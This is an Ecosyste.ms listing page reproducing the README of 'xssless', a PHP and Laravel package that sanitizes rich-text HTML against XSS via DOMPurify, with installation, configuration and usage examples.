Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/medilies/xssless
Clean your rich text from XSS threats.
https://github.com/medilies/xssless
cleaner html laravel purifier sanitizer xss
Last synced: about 2 months ago
JSON representation
Clean your rich text from XSS threats.
- Host: GitHub
- URL: https://github.com/medilies/xssless
- Owner: medilies
- License: mit
- Created: 2024-08-07T10:32:52.000Z (3 months ago)
- Default Branch: main
- Last Pushed: 2024-08-14T13:24:39.000Z (3 months ago)
- Last Synced: 2024-09-14T18:04:05.171Z (2 months ago)
- Topics: cleaner, html, laravel, purifier, sanitizer, xss
- Language: PHP
- Homepage:
- Size: 213 KB
- Stars: 27
- Watchers: 3
- Forks: 0
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOG.md
- Funding: .github/FUNDING.yml
- License: LICENSE.md
Awesome Lists containing this project
README
# Clean your rich text from XSS threats
[](https://packagist.org/packages/medilies/xssless)
[](https://github.com/medilies/xssless/actions?query=workflow%3Arun-tests+branch%3Amain)
[](https://github.com/medilies/xssless/actions?query=workflow%3A"phpstan"+branch%3Amain)
## Why use Xssless
- Your application features a [Rich Text Editor](https://en.wikipedia.org/wiki/Online_rich-text_editor) and you want to prevent all XSS.
- You want full HTML5 & CSS3 support.
- You want to allow all safe HTML elements, their attributes, and CSS properties without going deep into whitelist configs.
The default driver aligns with [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#html-sanitization) recommendations:
> ... OWASP recommends **DOMPurify** for HTML Sanitization.
## Requirements
- PHP >= 8.2
- ext-json
- Node >= 18
- NPM
## Installation
Install the package via composer:
```bash
composer require medilies/xssless
```
For non Laravel projects, pick a config and run the following code:
```php
$config = new Medilies\Xssless\Dompurify\DompurifyCliConfig('node', 'npm');
(new Medilies\Xssless\Xssless)
->using($config)
->setup();
```
For Laravel projects, run the following command:
```shell
php artisan xssless:setup
```
## Usage
Using `Medilies\Xssless\Dompurify\DompurifyCliConfig`:
```php
(new Medilies\Xssless\Xssless)
->using(new Medilies\Xssless\Dompurify\DompurifyCliConfig)
->clean($html);
```
Using `Medilies\Xssless\Dompurify\DompurifyServiceConfig`:
```php
$config = new Medilies\Xssless\Dompurify\DompurifyServiceConfig(
host: '127.0.0.1',
port: 63000
);
$xssless = (new Medilies\Xssless\Xssless)
->using($config);
/**
* It is better to have this part in a separate script
* that runs continuously and independently from your app
*/
$xssless->start();
$xssless->clean($html);
```
### Laravel usage
You can publish the config file with:
```bash
php artisan vendor:publish --tag="xssless-config"
```
This is the contents of the published config file:
```php
return [
'default' => 'dompurify-cli',
'drivers' => [
'dompurify-cli' => new DompurifyCliConfig(
node: env('NODE_PATH', 'node'), // @phpstan-ignore argument.type
npm: env('NPM_PATH', 'npm'), // @phpstan-ignore argument.type
binary: null,
tempFolder: null,
),
'dompurify-service' => new DompurifyServiceConfig(
node: env('NODE_PATH', 'node'), // @phpstan-ignore argument.type
npm: env('NPM_PATH', 'npm'), // @phpstan-ignore argument.type
host: '127.0.0.1',
port: 63000,
binary: null,
),
],
];
```
Run the following command (Not required by all drivers):
```shell
php artisan xssless:start
```
Use the facade:
```php
Medilies\Xssless\Laravel\Facades\Xssless::clean($html);
```
## Changelog
Please see [CHANGELOG](CHANGELOG.md) for more information on what has changed recently.
## Contributing
Please see [CONTRIBUTING](CONTRIBUTING.md) for details.
## Security Vulnerabilities
Please review [our security policy](../../security/policy) on how to report security vulnerabilities.
## Credits
- [medilies](https://github.com/medilies)
- [All Contributors](../../contributors)
## License
The MIT License (MIT). Please see [License File](LICENSE.md) for more information.